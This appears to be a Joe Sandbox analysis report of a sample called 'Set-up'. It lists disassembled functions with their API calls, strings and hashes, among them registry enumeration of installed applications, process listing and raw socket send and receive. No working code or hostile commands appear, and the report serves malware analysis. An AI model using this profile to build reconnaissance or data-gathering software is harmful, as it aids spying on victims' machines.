String ID: %s\%s$DisplayName$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall$app_name$d$index$installed_apps
API String ID: 3231578192-3120786300
Opcode ID: 456e64dafb64b9dc15054c483c88eacc810c0b3463b780f50a26024c03b9109a
Instruction ID: 380d36bf83cfc08b4cbf22d9f60f048dbaef6a8582a0930ed60b9164e0b570cd
Opcode Fuzzy Hash: 456e64dafb64b9dc15054c483c88eacc810c0b3463b780f50a26024c03b9109a
Instruction Fuzzy Hash: 1871B4B4904319DFDB50EFA9C58479EBBF0BF84308F11896DE99897301D7749A888F92

Function 003AE5D0 Relevance: 19.6, APIs: 13, Instructions: 107
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,003547C4,?,00000000,00000000,00000000,?,00000000,?,0033A31E,?,0084C8F4), ref: 003AE5E2
MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,00000001,00000000,00000000,?,00000000,003547C4,?,00000000,00000000,00000000,?,00000000,?), ref: 003AE5FA
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001), ref: 003AE637
strlen.API-MS-WIN-CRT-STRING-L1-1-0(0033A31E), ref: 003AE64D
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,0033A31E,00000001,?,00000008,?,?,00000000,003547C4,?,00000000,00000000,00000000,?,00000000), ref: 003AE665
_wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,003547C4,?,00000000,00000000,00000000,?,00000000,?,0033A31E,?,0084C8F4), ref: 003AE678
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,003547C4,?,00000000,00000000,00000000,?,00000000,?,0033A31E,?,0084C8F4), ref: 003AE685
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,003547C4,?,00000000,00000000,00000000,?,00000000,?,0033A31E,?,0084C8F4), ref: 003AE690
fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,0033A31E,?,?,?,?,00000000,003547C4,?,00000000,00000000,00000000,?,00000000,?,0033A31E), ref: 003AE6A6
GetLastError.KERNEL32(?,00000000,003547C4,?,00000000,00000000,00000000,?,00000000,?,0033A31E,?,0084C8F4), ref: 003AE6B0
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,00000000,003547C4,?,00000000,00000000,00000000,?,00000000,?), ref: 003AE6CC
GetLastError.KERNEL32(?,00000000,003547C4,?,00000000,00000000,00000000,?,00000000,?,0033A31E,?,0084C8F4), ref: 003AE6E2
fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,0033A31E,?,00000000,003547C4,?,00000000,00000000,00000000,?,00000000,?,0033A31E,?,0084C8F4), ref: 003AE6FA

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_errnofopenstrlen$_wfopen
String ID:
API String ID: 2867842857-0
Opcode ID: c1ccdb7f120ff26ab12bf6d6f8757d6070e5996a37fc1fd08aa9fe22221e6081
Instruction ID: ecd593ca9113b4150d0ad7e299a8f127be3bfd73e7c8ffd00d03fb135e9eb1e4
Opcode Fuzzy Hash: c1ccdb7f120ff26ab12bf6d6f8757d6070e5996a37fc1fd08aa9fe22221e6081
Instruction Fuzzy Hash: FF314776610600BFE7216F71DC5EF2A3B69FB42712F108524F912C92E1EB30D900CB61

Function 00208B50 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 263
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32(?,?,00000001), ref: 00208C2F
WSAGetLastError.WS2_32 ref: 00208C39
SleepEx.KERNELBASE(00000000,00000000), ref: 00208CF3
getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 00208D0E
WSAGetLastError.WS2_32 ref: 00208D18
WSASetLastError.WS2_32(00000000), ref: 00208E0C

Strings

connected, xrefs: 00208DA7
not connected yet, xrefs: 00208BDC
cf-socket.c, xrefs: 00208EDF
connect to %s port %u from %s port %d failed: %s, xrefs: 00208E78
local address %s port %d..., xrefs: 00208C7F

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: ErrorLast$Sleepconnectgetsockopt
String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
API String ID: 2513251565-879669977
Opcode ID: a4e35af729e7f5bc44b2c559b2c02d4e22fa7063a6939f9de84d0a3cf0d70a3e
Instruction ID: 6d875bc7a5e3bc23d15da09e84cb62b98834eb07e54ada6a90aaeee256eced32
Opcode Fuzzy Hash: a4e35af729e7f5bc44b2c559b2c02d4e22fa7063a6939f9de84d0a3cf0d70a3e
Instruction Fuzzy Hash: 54B1C0706147469FD710CF24C885BABBBE0AF55318F048629F899872D3EB71EC64CB61

Function 001D76A0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 69
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32(@~,?,?,?), ref: 001D76DE
send.WS2_32(@~,?,?,?), ref: 001D76EA
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 001D7721
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 001D7745
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 001D774D

Strings

SEND %s:%d send(%lu) = %ld, xrefs: 001D76F8
LIMIT %s:%d %s reached memlimit, xrefs: 001D7712, 001D7731
send, xrefs: 001D770B, 001D772A
@~, xrefs: 001D76B8, 001D76DD, 001D76E9

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: send$__acrt_iob_func_errnofflush
String ID: @~$LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$send
API String ID: 3540913164-4118987562
Opcode ID: f5bef5662b7063a65c975047fca8f54f4d17bf04926d13921379842e4b5227fa
Instruction ID: dbdd493f492b9a0f04168c91a54a7d77a318bfd7a295864fa8ed2133462a195a
Opcode Fuzzy Hash: f5bef5662b7063a65c975047fca8f54f4d17bf04926d13921379842e4b5227fa
Instruction Fuzzy Hash: 501108B591D3847FE220AF569D4DD277B6CDB86B68F05090AF80893392E7A1DC40D6B1

Function 003547B0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 95
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003AE5D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,003547C4,?,00000000,00000000,00000000,?,00000000,?,0033A31E,?,0084C8F4), ref: 003AE5E2
Part of subcall function 003AE5D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,00000001,00000000,00000000,?,00000000,003547C4,?,00000000,00000000,00000000,?,00000000,?), ref: 003AE5FA
Part of subcall function 003AE5D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001), ref: 003AE637
Part of subcall function 003AE5D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(0033A31E), ref: 003AE64D
Part of subcall function 003AE5D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,0033A31E,00000001,?,00000008,?,?,00000000,003547C4,?,00000000,00000000,00000000,?,00000000), ref: 003AE665
Part of subcall function 003AE5D0: _wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,003547C4,?,00000000,00000000,00000000,?,00000000,?,0033A31E,?,0084C8F4), ref: 003AE678
Part of subcall function 003AE5D0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,003547C4,?,00000000,00000000,00000000,?,00000000,?,0033A31E,?,0084C8F4), ref: 003AE685
Part of subcall function 003AE5D0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,003547C4,?,00000000,00000000,00000000,?,00000000,?,0033A31E,?,0084C8F4), ref: 003AE690
Part of subcall function 003AE5D0: fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,0033A31E,?,?,?,?,00000000,003547C4,?,00000000,00000000,00000000,?,00000000,?,0033A31E), ref: 003AE6A6

strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,00000062,?,0084C8F4), ref: 003547CC
GetLastError.KERNEL32(?,?,?,?,?,?,0084C8F4), ref: 0035483D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,0084C8F4), ref: 00354855
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,0084C8F4), ref: 00354860
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,0084C8F4), ref: 0035488E

Strings

crypto/bio/bss_file.c, xrefs: 00354830, 00354877, 003548A4
BIO_new_file, xrefs: 00354829, 00354870, 0035489D
calling fopen(%s, %s), xrefs: 00354845

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _errno$ByteCharMultiWide$strlen$ErrorLast_wfopenfclosefopenstrchr
String ID: BIO_new_file$calling fopen(%s, %s)$crypto/bio/bss_file.c
API String ID: 3063597995-203430365
Opcode ID: 2d5be18d03a1a818c3ebf1a2fe7a3bd19e7083f25ad46be5d709a158f7bc0df8
Instruction ID: 92e63b4af57ac989d390dccb8599255304299d003a33fb4cef60a0309e9e3c15
Opcode Fuzzy Hash: 2d5be18d03a1a818c3ebf1a2fe7a3bd19e7083f25ad46be5d709a158f7bc0df8
Instruction Fuzzy Hash: D6210AA6F443447BE12272B03C47F2B3949EB52B5DF150474FE19AD2C3FA5A991842B3

Function 001D31D7 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 73processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 001D31EF
Process32First.KERNEL32 ref: 001D3245
Process32Next.KERNEL32 ref: 001D32CC
CloseHandle.KERNELBASE ref: 001D32E7

Strings

CreateToolhelp32Snapshot failed., xrefs: 001D320E
name, xrefs: 001D3272
pid, xrefs: 001D3297
processes, xrefs: 001D32F3

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID: CreateToolhelp32Snapshot failed.$name$pid$processes
API String ID: 420147892-2059488242
Opcode ID: 0aa991f257e97d0c2e14e41db5f40dda09e14cc045166358c2c5c05f2af8a4eb
Instruction ID: d302047cbd942a92d14d326c35f82047f360bc0c54fdac9846601aff97fb1e89
Opcode Fuzzy Hash: 0aa991f257e97d0c2e14e41db5f40dda09e14cc045166358c2c5c05f2af8a4eb
Instruction Fuzzy Hash: 8831B6B49097159BCB50EFB8C58969EBBF4BF84304F01896DE898A7341E7349A44CF52

Function 001D7770 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 69networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,002094BF,?), ref: 001D77AE
recv.WS2_32(?,?,002094BF,?), ref: 001D77BA
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000000,00000630,cf-socket.c), ref: 001D77F1
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 001D7815
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 001D781D

Strings

RECV %s:%d recv(%lu) = %ld, xrefs: 001D77C8
LIMIT %s:%d %s reached memlimit, xrefs: 001D77E2, 001D7801
recv, xrefs: 001D77DB, 001D77FA

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: recv$__acrt_iob_func_errnofflush
String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
API String ID: 2542159810-640788491
Opcode ID: bee9c019080fd57a6ea4bd1229210ff74776b590a9d3e189bc4d4508eac3c41d
Instruction ID: ddbe9df15fcf553d7250872cc4ed7c4058ffc1434f52255bec228f29c226c5d0
Opcode Fuzzy Hash: bee9c019080fd57a6ea4bd1229210ff74776b590a9d3e189bc4d4508eac3c41d
Instruction Fuzzy Hash: FC112BB9A193947FD220AF55AD4DD277B6CEB8AB68F050909F80453392E7619C40C6B1

Function 00284950 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 167networkstringCOMMON

Download Yara Rule

APIs

htonl.WS2_32(7F000001), ref: 00284A21
gethostname.WS2_32(00000000,00000040), ref: 00284AA4
WSAGetLastError.WS2_32 ref: 00284AB3
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000002E), ref: 00284B3F

Strings

X\h, xrefs: 00284A74, 00284B53
`\h, xrefs: 00284B16
\\h, xrefs: 00284AC6

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: ErrorLastgethostnamehtonlstrchr
String ID: X\h$\\h$`\h
API String ID: 655544046-2496584675
Opcode ID: 6719b729d578d26b05f1a97cb37fb8d0b25dd6b6d03f0b323696f7fbc7149e0e
Instruction ID: ba38d86200a44eb2f8d27d8b34036688554c1c32084f7e1b45ceb9c3b1c5ff4a
Opcode Fuzzy Hash: 6719b729d578d26b05f1a97cb37fb8d0b25dd6b6d03f0b323696f7fbc7149e0e
Instruction Fuzzy Hash: DA51E478A267038BE730BF65DD4972376E4AF01319F14083DE98A876D1E7B4E864DB02

Function 001D75E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 63networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(?,?,?), ref: 001D7618
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 001D7659
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 001D767D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 001D7685

Strings

FD %s:%d socket() = %d, xrefs: 001D762E
socket, xrefs: 001D7643, 001D7662
LIMIT %s:%d %s reached memlimit, xrefs: 001D764A, 001D7669

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: __acrt_iob_func_errnofflushsocket
String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
API String ID: 166263346-842387772
Opcode ID: 1ec1af0a8517cc543a1a06a536dca1029163a8f550938cf753855fe476e23a3b
Instruction ID: 95e155db3b2f5bfc6330b66273359df1025ead80c2829497c322a10e5e399afa
Opcode Fuzzy Hash: 1ec1af0a8517cc543a1a06a536dca1029163a8f550938cf753855fe476e23a3b
Instruction Fuzzy Hash: 411159B6A096912BD7206F6AAC0AE4B3B94DF86764F050512F800923E2F321CC94D3A1

Function 0055D1D0 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 399COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0055D1E8

Strings

Inf, xrefs: 0055DCA5, 0055DCBD
@, xrefs: 0055D4B7
NaN, xrefs: 0055DBAB

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _errno
String ID: @$Inf$NaN
API String ID: 2918714741-141429178
Opcode ID: 85caf6073408e2082348982291331f470d219b7d7a5171790c93b17f4f9e46ae
Instruction ID: 9cebcb7902d74dd7b310c81c3118a5b0e683440bdb05ff9643fd0f2d29b9fa83
Opcode Fuzzy Hash: 85caf6073408e2082348982291331f470d219b7d7a5171790c93b17f4f9e46ae
Instruction Fuzzy Hash: 35F1AF726083868BD7319F24C0607ABBFF1BB85315F158A2EEDDD87281D7359909CB92

Function 00209290 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 143networkCOMMON

Download Yara Rule

APIs

Part of subcall function 001D76A0: send.WS2_32(@~,?,?,?), ref: 001D76DE

WSAGetLastError.WS2_32 ref: 002093C3

Part of subcall function 001ED8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,001E01B1), ref: 001ED8E2

WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0020935C
setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 00209388

Strings

send(len=%zu) -> %d, err=%d, xrefs: 00209447
cf-socket.c, xrefs: 002092CF
Send failure: %s, xrefs: 002093FB

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
